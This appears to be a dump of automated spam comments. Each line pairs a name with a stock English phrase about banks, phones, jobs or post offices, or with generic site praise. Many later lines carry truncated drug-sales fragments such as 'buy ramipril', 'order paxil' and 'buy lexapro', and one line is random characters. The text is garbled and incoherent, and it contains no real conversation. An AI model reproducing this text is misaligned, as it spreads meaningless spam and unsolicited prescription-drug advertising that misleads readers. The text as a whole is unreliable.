Layla : Children with disabilities .
Wally : I'd like to cancel a cheque .
Cooler111 : We'll need to take up references .
David : Where do you come from? .
Mitchell : A staff restaurant .
Linwood : I'm doing an internship .
Jarod : I'd like to open a business account .
Delmar : I want to report a .
Laurence : I sing in a choir .
Michal : Have you seen any good films recently? .
Reggie : I can't get a signal .
German : I read a lot .
Rocky : When do you want me to start? .
Payton : Sorry, you must have the wrong number .
Jesus : An estate agents .
Patrick : Will I have to work on Saturdays? .
Jimmi : Where's the nearest cash machine? .
Norris : this is be cool 8) .
Ramon : I'd like to cancel a cheque .
Luciano : How many are there in a book? .
Scotty : I'm on business .
Gabriella : A pension scheme .
Kieth : I can't hear you very well .
Hector : I'm on work experience .
Carlo : How many weeks' holiday a year are there? .
Wendell : This site is crazy :) .
Fritz : Could you transfer $1000 from my current account to my depos .
Darrell : Do you play any instruments? .
Tobias : We need someone with experience .
Ruben : i'm fine good work .
Cedrick : Go travelling .
Christian : Could I borrow your phone, please? .
Jeffery : Can you hear me OK? .
Gregory : Will I have to work on Saturdays? .
Johnny : I've just started at .
Rodrigo : This is your employment contract .
Augustine : I live in London .
Rebecca : Could I have a statement, please? .
Reinaldo : I was born in Australia but grew up in England .
Hunter : No, I'm not particularly sporty .
Alvin : What's the exchange rate for euros? .
Mohammed : I'd like some euros .
Norris : What are the hours of work? .
Reuben : I'd like to order some foreign currency .
Heyjew : Wonderfull great site .
Nickolas : I'd like to pay this in, please .
Peyton : I wanted to live abroad .
Orlando : I've just started at .
Lightsoul : The manager .
Derek : We went to university together .
Dalton : I like watching football .
Wiley : About a year .
Reynaldo : Is it convenient to talk at the moment? .
Everett : It's OK .
Quaker : Photography .
Friend35 : Have you read any good books lately? .
Juan : An envelope .
Christoper : I'd like to apply for this job .
Dannie : I'll call back later .
Charley : A company car .
Chris : I'm on a course at the moment .
Silas : I work for a publishers .
Virgilio : What's your number? .
Madison : real beauty page .
Elmer : Other amount .
Mariano : I like watching football .
Victoria : I'd like to send this to .
Santo : About a year .
Darryl : Could you tell me the number for ? .
Samuel : Thanks funny site .
Myron : Can I take your number? .
Federico : I live in London .
Leandro : A law firm .
Cyrus : Cool site goodluck :) .
Leonardo : We'd like to offer you the job .
Fredrick : I'd like to tell you about a change of address .
Forest : I'm on a course at the moment .
Garfield : I'm afraid that number's ex-directory .
Jose : This is the job description .
Elliott : Will I be paid weekly or monthly? .
Young : A financial advisor .
Rashad : We need someone with experience .
Adam : Could you tell me my balance, please? .
Elvis : Sorry, I ran out of credit .
Dwayne : How many weeks' holiday a year are there? .
Percy : I'm self-employed .
Sidney : How much is a First Class stamp? .
Zachariah : Do you know what extension he's on? .
Tyson : Go travelling .
Wiley : How many days will it take for the cheque to clear? .
Numbers : A book of First Class stamps .
Bryan : Where do you study? .
Plank : I'd like to send this parcel to .
Genaro : I'm a trainee .
Jamar : I'd like to change some money .
Quaker : I saw your advert in the paper .
Quinton : I quite like cooking .
Gabrielle : I don't know what I want to do after university .
Raymon : Could I order a new chequebook, please? .
Garry : I'm a partner in .
Bryan : What do you like doing in your spare time? .
Rueben : Do you know what extension he's on? .
Alphonse : I'm on a course at the moment .
Bradford : I'd like to apply for this job .
Dwight : Do you know the address? .
Eldridge : Could you tell me my balance, please? .
Donte : What's the exchange rate for euros? .
Maya : What do you study? .
Molly : Whereabouts in are you from? .
Cletus : How much will it cost to send this letter to ? .
Keenan : I can't stand football .
Maria : A Second Class stamp .
Pablo : I'd like to transfer some money to this account .
Benton : I quite like cooking .
Humberto : I love the theatre .
Janni : What qualifications have you got? .
Grant : Sorry, I ran out of credit .
Walker : What do you do for a living? .
Thomas : I really like swimming .
Timmy : I have my own business .
Marlon : When do you want me to start? .
Shelton : I like watching football .
Norman : Your account's overdrawn .
Victor : An envelope .
Roland : I can't get a dialling tone .
Mitchel : Your cash is being counted .
Elvin : I don't like pubs .
Rodrigo : Not in at the moment .
Ralph : I'm unemployed .
Dorian : We'd like to invite you for an interview .
Elliott : I was born in Australia but grew up in England .
Isabella : Will I have to work shifts? .
Whitney : Withdraw cash .
Waylon : An accountancy practice .
Chase : We need someone with qualifications .
Friend35 : The United States .
Philip : Which team do you support? .
Camila : When can you start? .
Armando : We need someone with experience .
Rodrigo : We'd like to invite you for an interview .
Cyrus : Canada>Canada .
Dominick : Wonderfull great site .
Damien : I came here to study .
Garfield : I'd like to transfer some money to this account .
Clifton : I love the theatre .
Elden : I work for a publishers .
Frederick : Other amount .
Diva : What company are you calling from? .
Joaquin : I'd like , please .
Kristopher : I'm a member of a gym .
Erich : I like it a lot .
Daryl : I came here to work .
Infest : real beauty page .
Eblanned : What part of do you come from? .
Landon : We were at school together .
Terry : Will I have to work shifts? .
Young : Will I have to work on Saturdays? .
Ashley : I'd like to order some foreign currency .
Keith : How do you do? .
Katherine : Could I have , please? .
Dario : We were at school together .
Charley : I've got a full-time job .
Andrew : Where's the postbox? .
Cletus : I'm sorry, I didn't catch your name .
Heath : I'm about to run out of credit .
Derek : I'd like to cancel a cheque .
Santo : A pension scheme .
Elton : I'd like to pay this in, please .
Gerardo : What sort of work do you do? .
Roderick : Some First Class stamps .
Norman : Could I order a new chequebook, please? .
Anna : I'd like to pay this cheque in, please .
Ismael : I do some voluntary work .
Jordan : I'm on holiday .
Dexter : I went to .
Arthur : What sort of music do you like? .
Ezekiel : Do you know each other? .
Eduardo : Directory enquiries .
Hector : The National Gallery .
Rodrigo : I saw your advert in the paper .
Chauncey : I was made redundant two months ago .
Allison : I'm sorry, I'm not interested .
Francesco : Could I have , please? .
Isreal : Your account's overdrawn .
Cordell : I'd like to change some money .
Reynaldo : I have my own business .
Micah : Could I order a new chequebook, please? .
Everette : I've got a full-time job .
Josue : Gloomy tales .
Hubert : Yes, I love it! .
Enoch : I love this site .
Eblanned : Can you hear me OK? .
Luigi : I'm happy very good site .
Zachery : It's serious .
Kenton : I'd like to withdraw $100, please .
Orlando : I'm only getting an answering machine .
German : I'm on a course at the moment .
Glenn : Hello good day .
Harris : Can you put it on the scales, please? .
Dudley : Free medical insurance .
Connor : I stay at home and look after the children .
Leonard : A law firm .
Jason : Remove card .
Reggie : We'd like to offer you the job .
Brant : A financial advisor .
Wally : Not available at the moment .
Barbera : What company are you calling from? .
Jerald : Get a job .
Trent : Is there ? .
Diego : Whereabouts in are you from? .
Lewis : In tens, please (ten pound notes) .
Maria : I need to charge up my phone .
Leland : I'd like to take the job .
Giuseppe : A Second Class stamp .
Danielle : I came here to work .
Donnell : I can't get a signal .
Leonard : I want to report a .
Audrey : Have you got any experience? .
Anton : I don't like pubs .
Armand : Canada>Canada .
Snoopy : Another year .
Raymundo : I'm unemployed .
Judson : I'd like to send this letter by .
Chloe : We're at university together .
Lorenzo : I'm training to be an engineer .
Dalton : I love this site .
Tyrell : Why did you come to ? .
Leandro : Best Site Good Work .
Merlin : What company are you calling from? .
Alex : I don't know what I want to do after university .
Nickolas : Where do you live? .
Luis : Stolen credit card .
Buster : I don't know what I want to do after university .
Carlton : I'm doing a phd in chemistry .
Stacy : We need someone with qualifications .
Courtney : I really like swimming .
Fausto : I'd like to take the job .
Moses : Where do you live? .
Stuart : Could I have , please? .
Ronnie : I have my own business .
Madeline : What are the hours of work? .
Brock : Where's the postbox? .
Chauncey : What's the last date I can post this to to arrive in time f .
Modesto : Good crew it's cool :) .
Hunter : Please call back later .
Mike : Until August .
Amelia : In tens, please (ten pound notes) .
Norris : Accountant supermarket manager .
Abraham : this is be cool 8) .
Lincoln : This is the job description .
Virgil : We used to work together .
Malcolm : Sorry, you must have the wrong number .
Enoch : I'd like to send this to .
Carmine : I'll call back later .
Addison : Do you know the address? .
Kenneth : How much does the job pay? .
Fermin : Cool site goodluck :) .
Byron : A packet of envelopes .
Domenic : I've just graduated .
Christoper : Yes, I love it! .
Malcom : Insert your card .
Sammy : Have you got any ? .
Edgar : I came here to study .
Dirtbill : A First Class stamp .
Ricky : I'm at Liverpool University .
George : How long have you lived here? .
Vanessa : Is it convenient to talk at the moment? .
Wilfred : real beauty page .
Amia : I'm doing a masters in law .
Wallace : No, I'm not particularly sporty .
Vicente : I've been cut off .
Bernard : A few months .
Aaliyah : I can't get a dialling tone .
Jefferey : Excellent work, Nice Design .
Ronny : I love the theatre .
Michelle : I'm a housewife .
Elroy : Sorry, I'm busy at the moment .
Enoch : Would you like to leave a message? .
Rogelio : I've lost my bank card .
Kendall : Not in at the moment .
Garfield : When can you start? .
Grant : Will I be paid weekly or monthly? .
Elias : Hold the line, please .
Eva : I'll put her on .
Derick : magic story very thanks .
Gianna : I'd like to order some foreign currency .
Ernie : Yes, I love it! .
Robbie : Could you give me some smaller notes? .
Haley : The National Gallery .
Issac : I'd like to tell you about a change of address .
Ezekiel : Would you like to leave a message? .
Gregorio : Directory enquiries .
Delbert : real beauty page .
Hubert : I study here .
Rubin : A law firm .
Mia : I'm in my first year at university .
Milan : I've been cut off .
Delbert : I'd like to transfer some money to this account .
Patric : Could you please repeat that? .
Lynwood : Hold the line, please .
Warner : Do you need a work permit? .
Rogelio : I came here to work .
Sheldon : I'll call back later .
Hector : My battery's about to run out .
Osvaldo : I'd like a phonecard, please .
Pablo : A law firm .
Nathaniel : I'm a member of a gym .
Jordon : Recorded Delivery .
Luciano : this is be cool 8) .
Young : We were at school together .
Darell : I've just started at .
Winford : Could I borrow your phone, please? .
Jada : Yes, I play the guitar .
Kelvin : I work here .
Quinton : Sorry, I'm busy at the moment .
Claude : I'm on a course at the moment .
Simon : How many are there in a book? .
Milton : Can you put it on the scales, please? .
Ethan : This is the job description .
Bradford : Looking for a job .
Lincoln : Can I use your phone? .
Palmer : I'm doing a masters in law .
Francesco : Please wait .
Brayden : Which team do you support? .
Lesley : I like watching TV .
Seymour : I'll put him on .
Mackenzie : Insufficient funds .
Aubrey : I'm sorry, she's .
Augustus : US dollars .
Rodrick : We used to work together .
Graig : I like watching football .
Payton : I came here to work .
Grace : Not in at the moment .
Harold : I'm doing a phd in chemistry .
Tyrone : Have you got a telephone directory? .
Nestor : This is your employment contract .
Philip : What line of work are you in? .
Joesph : How do you do? .
Kendrick : Could I have a statement, please? .
Samual : Is this a temporary or permanent position? .
Elijah : Have you got a telephone directory? .
Brenton : I'm a housewife .
Freddie : A packet of envelopes .
Luis : I'm training to be an engineer .
Robbie : I'm doing a phd in chemistry .
Diva : Your account's overdrawn .
Lyman : Do you know each other? .
Giuseppe : I wanted to live abroad .
Hunter : Have you got a telephone directory? .
Sofia : Could you ask him to call me? .
Kaitlyn : Very interesting tale .
Lyndon : Recorded Delivery .
Kristofer : History .
Wilson : I'll call back later .
Marshall : I'm on holiday .
Dennis : Do you like it here? .
Lily : What sort of music do you like? .
Jamal : I live in London .
Mitch : Your account's overdrawn .
Roman : I live here .
Alfonso : Have you got any ? .
Manuel : I'm only getting an answering machine .
Lowell : Is this a temporary or permanent position? .
Antoine : Have you got any ? .
Perry : I've just graduated .
Orval : Is there ? .
Winford : How long have you lived here? .
Cesar : I'm doing an internship .
Napoleon : Very interesting tale .
Alexander : I'm happy very good site .
Jeremy : I'd like to change some money .
Rodolfo : Have you got a telephone directory? .
Lonny : Do you know the number for ? .
Sofia : Could I have a statement, please? .
Zackary : A Second Class stamp .
Ellis : We need someone with experience .
Frederic : I love the theatre .
Mario : Could I have an application form? .
Franklin : An accountancy practice .
Ethan : I've lost my bank card .
Monroe : Can I call you back? .
Duncan : I'm interested in .
Lazaro : We used to work together .
Richard : Which university are you at? .
Jesse : This is the job description .
Rosario : It's a bad line .
Newton : I'm happy very good site .
Ernesto : I'm training to be an engineer .
Calvin : How many would you like? .
Kermit : I was born in Australia but grew up in England .
Bailey : What do you do? .
Morris : What company are you calling from? .
Jerrold : How many more years do you have to go? .
Maynard : We'll need to take up references .
Broderick : I'm sorry, I'm not interested .
Gregory : real beauty page .
Jarvis : I'll send you a text .
Jonathon : One moment, please .
Harold : Where are you from? .
Emory : I'll text you later .
Reuben : Thanks funny site .
Danial : The National Gallery .
Roscoe : Is there ? .
Justin : Some First Class stamps .
Bailey : I'd like to transfer some money to this account .
Mason : Could you give me some smaller notes? .
Carlos : Could you give me some smaller notes? .
Bennie : good material thanks .
Rogelio : I'm interested in this position .
Wiley : Have you got any qualifications? .
Behappy : I'm unemployed .
Magic : Hello good day .
Crazyivan : Do you know each other? .
Lewis : Best Site good looking .
Parker : I've come to collect a parcel .
Marissa : I'd like , please .
Damian : Where are you from? .
rduwwxdq : x8TUUE vzrkroalzeog, .
Dario : Nice to meet you .
Marvin : Sorry, I'm busy at the moment .
Forest : What do you do for a living? .
Donny : I'd like to order some foreign currency .
Collin : Do you play any instruments? .
Eldon : Sorry, I'm busy at the moment .
Cooper : What company are you calling from? .
Sanford : It's funny goodluck .
Dro4er : Do you know what extension he's on? .
Walton : Can I call you back? .
Jonathan : Photography .
Noah : I'd like some euros .
Darrell : It's funny goodluck .
Walker : I'm at Liverpool University .
Quincy : How do I get an outside line? .
Adolfo : Lost credit card .
Edmond : Please call back later .
Andrew : Who's calling? .
Rocky : What do you want to do when you've finished? .
Coolman : Will I be paid weekly or monthly? .
Cesar : This is the job description .
Bella : I'd like to speak to someone about a mortgage .
Hosea : I'll put her on .
Damion : Are you a student? .
Gabrielle : What company are you calling from? .
Rolland : How many would you like? .
Merle : I'm afraid that number's ex-directory .
Chadwick : I never went to university .
Bernardo : We'd like to invite you for an interview .
Bradford : Get a job .
Cristopher : What university do you go to? .
Roderick : How much is a Second Class stamp? .
Irwin : The United States .
Sierra : I'd like to speak to someone about a mortgage .
Malik : We'll need to take up references .
Bailey : Stolen credit card .
Issac : I'm self-employed .
Jospeh : I'd like to tell you about a change of address .
Mckinley : How many weeks' holiday a year are there? .
Louis : Until August .
Boyce : I don't know what I want to do after university .
Forest : Would you like a receipt? .
Marquis : i'm fine good work .
Ricky : Special Delivery .
Gayle : The line's engaged .
Graham : Stolen credit card .
Carlo : I'd like to pay this cheque in, please .
Jackie : I'm doing a phd in chemistry .
Tyree : On another call .
Savannah : I'll put him on .
Melanie : Could I have a statement, please? .
Harrison : Do you know the number for ? .
Dustin : very best job .
Sterling : I've got a very weak signal .
Felton : Who's calling? .
Maynard : Did you go to university? .
Kenneth : How many weeks' holiday a year are there? .
Jordon : I can't get a signal .
Danny : I like watching football .
Emmett : I work for a publishers .
Connie : Have you read any good books lately? .
Dewey : How many days will it take for the cheque to clear? .
Dennis : How do I get an outside line? .
Elbert : Are you a student? .
Daron : I love the theatre .
Lance : I want to make a withdrawal .
Herbert : How do I get an outside line? .
Dudley : I'm on a course at the moment .
Tyler : What are the hours of work? .
Aubrey : I'm sorry, she's .
Avery : We need someone with qualifications .
Ella : Have you read any good books lately? .
Columbus : In a meeting .
Santo : Have you got a current driving licence? .
Grant : I'll put her on .
Carrol : I went to .
Freelove : An accountancy practice .
Jarvis : I'm sorry, I'm not interested .
Taylor : A Second Class stamp .
Eduardo : How do you spell that? .
Dusty : I'm retired .
Payton : It's a bad line .
Randy : I'd like to send this letter by .
Harold : This site is crazy :) .
Dustin : I'm at Liverpool University .
Warner : A law firm buy ramipril .
Kenton : Which university are you at? wha .
Eldon : The line's engaged cheap ama .
Alvin : A financial advisor .
Reginald : I'd like to withdraw $100, please .
Sterling : Do you know the number for ? w .
Timmy : In a meeting buy chloroquine .
Lucas : We need someone with qualifications .
Jonas : I'm unemployed .
Osvaldo : Have you got a current driving licence? .
Darryl : Could you ask her to call me? .
Florencio : I'm not interested in football .
Gabriel : We'd like to invite you for an interview .
Dirtbill : real beauty page buy beta .
Dghonson : Do you like it here? buy .
Herschel : Stolen credit card .
Hilton : I've lost my bank card .
Kelley : Lost credit card .
Frankie : A First Class stamp .
Vanessa : I'm at Liverpool University .
Donnie : It's serious bu .
Jamar : International directory enquiries .
Wally : How do you know each other? .
Clint : Who do you work for? .
Luther : Could you please repeat that? .
Desmond : Do you like it here? .
Gabriella : I need to charge up my phone .
Mariah : Could you transfer $1000 from my current account to my depos .
Bradley : Other amount .
Jonathon : I'm at Liverpool University .
Adam : A jiffy bag .
Barney : I'd like to open a personal account .
Owen : I study here .
Tyrell : A few months .
Hilario : I've been cut off .
Hosea : How much is a First Class stamp? .
Ronnie : I'd like to order some foreign currency .
Eusebio : No, I'm not particularly sporty .
Jaime : I went to .
Johnson : Would you like to leave a message? .
Janni : Could you ask him to call me? .
Rodrick : Thanks for calling .
Preston : It's a bad line .
Judson : What do you like doing in your spare time? .
Garth : On another call cata .
Evelyn : I'd like to pay this cheque in, please cat .
Angelo : Until August where can i bu .
Tyrone : Could you tell me the number for ? .
Bobber : Enter your PIN .
Dusty : Which team do you support? .
Samual : I'm doing a masters in law .
August : US dollars .
Margarito : I'm not working at the moment .
Aaliyah : I'm on a course at the moment .
Jeremiah : Where's the nearest cash machine? .
Thanh : There's a three month trial period .
Bobbie : Where's the postbox? .
Gobiz : I can't get a signal .
Markus : Have you read any good books lately? .
Augustus : Will I get travelling expenses? .
Darron : How many are there in a book? .
Ramiro : My battery's about to run out .
Grace : I've just started at .
Alfonso : Best Site good looking .
Colton : I came here to study .
Norman : Thanks funny site .
Seymour : I'm doing a masters in law .
Felton : This site is crazy :) clar .
Myles : A financial advisor c .
Julia : No, I'm not particularly sporty .
Erick : I'm not working at the moment .
Jerrold : Thanks funny site .
Werner : How much notice do you have to give? .
Wallace : I've got a full-time job .
Nigel : I can't get through at the moment .
Arnoldo : I'd like to open an account .
Thanh : Have you got any qualifications? .
Jaime : Could you ask him to call me? .
Dirtbill : I'm only getting an answering machine .
Damon : Directory enquiries .
Carrol : I'm at Liverpool University .
Richard : I'd like to open a business account .
Jewell : very best job .
Walker : I'd like a phonecard, please .
Douglass : What sort of music do you listen to? .
Craig : I hate shopping c .
Shelton : Have you got any ? can i m .
Lynwood : Please wait buy cyclopho .
Daryl : How many weeks' holiday a year are there? .
Bella : US dollars .
Devon : Can I use your phone? .
Jeramy : How would you like the money? .
Forrest : Pleased to meet you .
Thebest : Jonny was here .
Danial : I didn't go to university .
Dennis : I can't hear you very well .
Jaden : Do you know the number for ? .
Jacob : Get a job .
Timothy : Nice to meet you .
Phillip : A law firm .
Harold : What do you like doing in your spare time? .
Diva : I'm retired .
Abdul : Cool site goodluck :) .
Rickie : Insert your card .
Carey : History .
Jason : Withdraw cash .
Angelina : I live in London .
Truman : I quite like cooking .
Chadwick : How many more years do you have to go? .
Pablo : How do you spell that? .
Gavin : I can't get a signal .
Joshua : I've got a full-time job .
Pasquale : I'm on holiday where to bu .
Desmond : A packet of envelopes .
Tommie : I'm about to run out of credit .
Lamont : Three years purchase endep on .
Reynaldo : I've just started at .
Marlin : Children with disabilities .
Brandon : Not available at the moment .
Crazyivan : In a meeting order hydrochl .
Kaitlyn : History cheapest estradiol .
Ronald : Looking for a job buy eska .
Nevaeh : Enter your PIN .
Hosea : Incorrect PIN .
Landon : I'd like to open a business account .
Khloe : I'm sorry, she's .
Gayle : very best job buy ofloxacin on .
Mohammad : I'm in my first year at university .
Shane : In tens, please (ten pound notes) .
Nicole : Yes, I love it! purchase geo .
Raleigh : How do you spell that? bu .
Ronald : I work with computers gli .
Bennie : How much will it cost to send this letter to ? furac .
Lyman : How do you spell that? .
Norris : Thanks for calling .
Cyrus : It's a bad line .
Rolando : I'm training to be an engineer .
Chase : How much does the job pay? .
Blake : Could I take your name and number, please? .
Daryl : I want to report a .
Frances : Have you got any qualifications? .
Lewis : Free medical insurance .
Ivory : Do you like it here? .
Kenny : What's the last date I can post this to to arrive in time f .
Sterling : I'd like to cancel a cheque .
Booker : Could I have a statement, please? .
Steep777 : Your account's overdrawn .
Francisco : Do you know the number for ? .
Aiden : Could I order a new chequebook, please? .
Gerardo : I'd like to pay this in, please .
Jonah : I'm not working at the moment uniq .
Casey : We've got a joint account .
Lindsey : How many would you like? .
Daryl : I'd like to speak to someone about a mortgage .
Mackenzie : We've got a joint account .
Scott : An envelope .
Marissa : Three years .
Jimmie : What's your number? .
Daron : How many would you like? .
Kennith : I'd like to withdraw $100, please .
Boyce : Excellent work, Nice Design .
Jewel : How many weeks' holiday a year are there? .
Jerrold : Incorrect PIN .
Leonel : How many weeks' holiday a year are there? .
Mitchell : A staff restaurant .
Mauricio : Languages .
Josue : Looking for work .
Kenton : We were at school together .
Duncan : I'm unemployed .
Roland : I'd like to pay this cheque in, please .
Roberto : Children with disabilities .
Sterling : Until August .
Maximo : It's funny goodluck .
Avery : Sorry, you must have the wrong number .
Numbers : A jiffy bag .
Donovan : Languages .
Serenity : How many more years do you have to go? .
Bob : In tens, please (ten pound notes) .
Isiah : I can't get through at the moment .
Antonia : I can't stand football .
Charlotte : I've lost my bank card .
Cesar : Who do you work for? buy ch .
Clark : I'm doing a masters in law .
Cordell : I work with computers imitr .
Garland : How do you do? order imitre .
Darrin : Insert your card .
Darius : I'd like to transfer some money to this account .
Donnie : What qualifications have you got? .
Lawerence : Another service? .
Frances : Just over two years .
Erich : I'm a trainee .
Johnny : real beauty page .
Darren : Whereabouts in are you from? .
Daryl : Could you give me some smaller notes? .
Silas : Where do you study? .
Gilbert : How much is a Second Class stamp? .
Oswaldo : I'd like a phonecard, please .
Barton : Could you ask her to call me? .
Charlotte : What do you want to do when you've finished? .
Mauro : Where are you from? .
Cedrick : What university do you go to? .
Kaylee : What do you study? .
Dylan : Best Site Good Work .
Chuck : It's serious .
Friend35 : I'm training to be an engineer .
Marty : I love the theatre .
Johnnie : What's the interest rate on this account? whe .
Johnathan : I'm training to be an engineer .
Branden : I study here .
Sarah : Do you need a work permit? .
Vaughn : What qualifications have you got? .
Rolando : Where are you from? .
Melissa : I study here .
Efrain : I'm on work experience .
Mariano : What do you study? .
Sterling : I don't like pubs .
Russell : I'm a trainee .
Lowell : I'd like to change some money .
Faustino : What's your number? .
Rayford : I'm a partner in .
Owen : How do you spell that? .
Floyd : Could you tell me the number for ? .
Mariah : What do you want to do when you've finished? .
Malcom : How much notice do you have to give? purchase met .
Vida : How many days will it take for the cheque to clear? .
Virgil : This is your employment contract m .
Layla : How would you like the money? .
Luigi : I can't get a signal buy che .
Mitch : Could you tell me the dialing code for ? .
Norman : I live in London purc .
Keneth : I'm a partner in buy me .
Malik : Have you read any good books lately? ni .
William : How much is a Second Class stamp? .
Allison : Remove card order na .
Chong : Insufficient funds noroxine .
Jacob : I love this site order paxil .
Delbert : I was born in Australia but grew up in England buy felodipine o .
Darrel : What line of work are you in? .
Cooler111 : Do you know the address? .
Daren : How many days will it take for the cheque to clear? .
Tracy : I'm on business .
Randy : I read a lot .
Trevor : I'd like to apply for this job .
Arnulfo : How do I get an outside line? pr .
Hassan : Special Delivery purchase .
Romeo : Have you read any good books lately? .
Salvatore : I'd like to tell you about a change of address .
Gayle : In tens, please (ten pound notes) .
Wilburn : I'll put her on .
Avery : Do you like it here? .
Bryce : Could you send me an application form? .
Elbert : I'm on business prop .
Isaias : I'm originally from Dublin but now live in Edinburgh .
Elden : No, I'm not particularly sporty .
Roman : I'm not interested in football .
Theron : I saw your advert in the paper .
Walker : Sorry, I'm busy at the moment .
Homer : I'd like to transfer some money to this account .
Norberto : I'm in my first year at university .
Evan : What's the interest rate on this account? .
Curtis : We were at school together .
Darrick : What line of work are you in? .
Donald : I've just started at .
Samuel : I can't get a signal .
Scotty : I'd like to speak to someone about a mortgage .
Mervin : Is it convenient to talk at the moment? .
Kerry : I've been made redundant .
Enoch : I'm training to be an engineer .
Brenton : What sort of music do you listen to? .
Duncan : this post is fantastic .
Richie : Where are you from? .
Quincy : International directory enquiries .
Isidro : I'd like to tell you about a change of address .
Dominick : I'd like to open a personal account .
Hiram : I'll put him on .
Fletcher : An envelope .
Johnnie : I was born in Australia but grew up in England .
Terrence : What sort of music do you listen to? .
Gilberto : Special Delivery .
Casey : What do you want to do when you've finished? .
Dusty : Where do you live? .
Trevor : I can't stand football .
Ignacio : I was born in Australia but grew up in England .
Robert : Have you read any good books lately? .
Emma : I came here to work .
Tyrone : A Second Class stamp .
Joshua : Could you transfer $1000 from my current account to my depos .
Ralph : Could I ask who's calling? .
Leandro : Very interesting tale .
Hobert : Yes, I love it! .
Tyson : This site is crazy :) .
Robert : About a year .
Zachary : What do you do for a living? .
Landon : Another service? .
Crazyfrog : Pleased to meet you .
Autumn : Why did you come to ? purch .
Gaylord : Sorry, you must have the wrong number .
Kaylee : Do you know the address? chea .
Infest : This is the job description .
Alfonzo : I've come to collect a parcel .
Mishel : I'm sorry, I'm not interested .
Jefferey : Three years .
Mohammad : Could you transfer $1000 from my current account to my depos .
Steve : this post is fantastic .
Carmine : How many more years do you have to go? .
James : I'd like to take the job .
Frederic : I never went to university .
Joseph : What part of do you come from? .
Cedrick : Through friends .
Fausto : I love the theatre .
Dominick : I'm originally from Dublin but now live in Edinburgh .
Chris : I've been made redundant .
John : I'm afraid that number's ex-directory .
Efren : I'm sorry, I'm not interested .
Josue : Enter your PIN .
Andres : How many would you like? .
Lenny : What's your number? .
Courtney : It's a bad line .
Galen : Free medical insurance .
Kieth : How would you like the money? .
Zoe : Nice to meet you .
Timmy : I'll call back later .
Andres : US dollars .
Wayne : Languages .
Geraldo : Have you got a telephone directory? .
Kaylee : It's serious order salmete .
Arianna : very best job cheap s .
Arden : What's the last date I can post this to to arrive in time f .
Hobert : I saw your advert in the paper .
Mario : Hello good day .
Norman : The United States order metax .
Leandro : I stay at home and look after the children buy suprax .
Ricardo : I love this site .
Mike : We're at university together .
Geoffrey : What sort of music do you listen to? .
Serenity : Could you ask him to call me? .
Mauro : I'd like to send this parcel to .
Allen : How would you like the money? .
Bailey : Accountant supermarket manager .
Brendan : Could I ask who's calling? .
Vince : What do you do for a living? .
Francisco : Could you tell me my balance, please? .
Elijah : I'm interested in .
Lamont : How many would you like? .
Wilson : Best Site Good Work .
Megan : I don't like pubs wher .
Dwayne : Best Site good looking amoxicill .
Aubrey : I'd like to open an account tizanidin .
Darren : I like watching football v .
Dominic : Who do you work for? buy en .
Marquis : What sort of music do you like? zanaf .
Chloe : Will I get paid for overtime? .
Angelo : Is it convenient to talk at the moment? pu .
Donny : We used to work together buy .
Wilson : I came here to work zenegra .
Winford : What's the current interest rate for personal loans? .
Collin : I do some voluntary work .
Ellsworth : How do you do? .
Eric : What university do you go to? .
Travis : I'd like a phonecard, please .
Martin : I didn't go to university ch .
Snoopy : Which university are you at? .
Clair : I'm a member of a gym .
Alden : I hate shopping .
Garret : very best job .
Deandre : Your cash is being counted .
Jake : Could I order a new chequebook, please? .
Benito : I've just graduated .
Napoleon : I can't get through at the moment .
Zoey : Could I take your name and number, please? .
Stevie : I was made redundant two months ago .
Maria : International directory enquiries .
Trevor : I'd like to open a business account .
Kelley : Gloomy tales where can i .
Broderick : What do you study? pu .
Garland : We need someone with experience .
Rolando : Do you know the number for ? .
Orville : In tens, please (ten pound notes) .
Juan : I'd like to cancel this standing order .
Elizabeth : Do you know each other? .
Johnie : Go travelling .
Quaker : Can I call you back? .
Merle : How many days will it take for the cheque to clear? .
Reinaldo : Looking for work .
Ronny : Would you like a receipt? .
Markus : What do you do? .
Terrence : Best Site good looking .
Enrique : I'd like to tell you about a change of address .
Lifestile : Looking for work .
Grady : I can't get a dialling tone .
Hosea : The manager .
Dwight : I was born in Australia but grew up in England .
Cole : There's a three month trial period .
Dewayne : Have you got a telephone directory? .
Taylor : A jiffy bag .
Edmond : I'm sorry, I didn't catch your name .
Filiberto : Could I borrow your phone, please? .
Korey : Very Good Site .
Michale : I don't like pubs .
Janni : An estate agents .
Ronny : I can't hear you very well .
Kenton : A First Class stamp .
Riley : I've just started at .
Casey : I've been cut off .
Edmundo : Good crew it's cool :) .
Andres : I came here to work .
Dusty : I'm sorry, I'm not interested .
Kendall : What sort of music do you listen to? .
Paige : When do you want me to start? .
Dusty : real beauty page .
Marcellus : Do you need a work permit? .
Lonny : We went to university together .
Filiberto : Punk not dead .
Dewayne : A First Class stamp .
Caleb : Will I have to work on Saturdays? .
Ricky : A few months .
Thomas : I'm in a band .
Michel : I'd like to speak to someone about a mortgage .
Jimmy : Could you transfer $1000 from my current account to my depos .
Aaliyah : I'm a trainee .
Chung : Special Delivery .
Gerardo : I've just graduated .
Myron : i'm fine good work ba .
Roosevelt : How much were you paid in your last job? bac .
Manual : Who would I report to? b .
Jonathon : Did you go to university? .
Kyle : I'd like to open a business account buy g .
Randal : Yes, I play the guitar .
Abram : I quite like cooking .
Robin : Stolen credit card .
Major : I can't stand football .
Hershel : I support Manchester United .
Rodrick : I study here .
Forrest : It's funny goodluck .
Porter : Are you a student? .
Pasquale : It's serious .
Edmond : I quite like cooking .
Freddy : this post is fantastic .
Blair : Stolen credit card buy c .
Raymond : Where's the nearest cash machine? c .
Emanuel : What's the interest rate on this account? .
Ulysses : Stolen credit card .
Christoper : Hello good day .
Barbera : A financial advisor .
Rodrigo : I'm retired .
Cooler111 : Incorrect PIN .
Tyler : Excellent work, Nice Design .
Jewel : I saw your advert in the paper .
Jamison : I quite like cooking .
Hiram : Where do you come from? .
Dillon : good material thanks .
Damian : We've got a joint account .
Columbus : I've been cut off .
Josiah : I read a lot buy levofl .
Antonio : Photography ord .
Johnathan : Please wait buy lexapro .
Harvey : Three years b .
Wilton : We're at university together .
Jackson : Could you ask him to call me? .
Andre : Not in at the moment .
Mia : good material thanks orde .
Randolph : What do you do? buy ge .
Reuben : Which team do you support? order gabap .
Gregg : What do you do for a living? .
Wilbert : I'd like to open a personal account .
Colby : Could you tell me my balance, please? .
Enoch : What do you want to do when you've finished? .
Cristobal : Whereabouts are you from? .
Xavier : Sorry, you must have the wrong number buy generic .
Johnny : How many are there in a book? .
Bryan : Until August where can .
Columbus : Where are you from? .
Newton : How would you like the money? .
Allan : I'll send you a text .
Dominick : I'd like to withdraw $100, please .
Lonny : Cool site goodluck :) .
